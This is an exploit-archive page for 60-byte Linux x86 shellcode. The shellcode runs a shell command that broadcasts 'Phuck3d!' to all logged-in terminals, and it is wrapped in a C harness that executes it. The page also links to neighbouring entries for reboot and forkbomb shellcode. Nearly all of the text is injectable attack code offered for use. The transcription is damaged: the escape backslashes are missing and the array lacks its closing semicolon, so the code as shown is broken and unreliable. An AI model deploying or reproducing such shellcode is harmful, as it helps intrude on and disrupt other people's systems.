[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
# Published : 2010-04-25
# Author : condis
# Previous Title : Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode
# Next Title : Linux x86 polymorphic forkbombe - 30 bytes
/*
$Id: where-is-wallie.c, v 1.0 2010/04/24 18:32:29 condis Exp $
linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
by condis
Tested on: Linux Debian
*/
int main(void)
{
char evil[] =
"x6ax0b" // push $0xb
"x58" // pop %eax
"x99" // cltd
"x52" // push %edx
"x68x77x61x6cx6c" // push $0x6c6c6177
"x68x21x20x7cx20" // push $0x207c2021
"x68x63x6bx33x64" // push $0x64336b63
"x68x20x50x68x75" // push $0x75685020
"x68x65x63x68x6f" // push $0x6f686365
"x89xe6" // mov %esp,%esi
"x52" // push %edx
"x66x68x2dx63" // pushw $0x632d
"x89xe1" // mov %esp,%ecx
"x52" // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp,%ebx
"x52" // push %edx
"x56" // push %esi
"x51" // push %ecx
"x53" // push %ebx
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
void(*boom)()=(void*)evil;
boom();
return 0;
}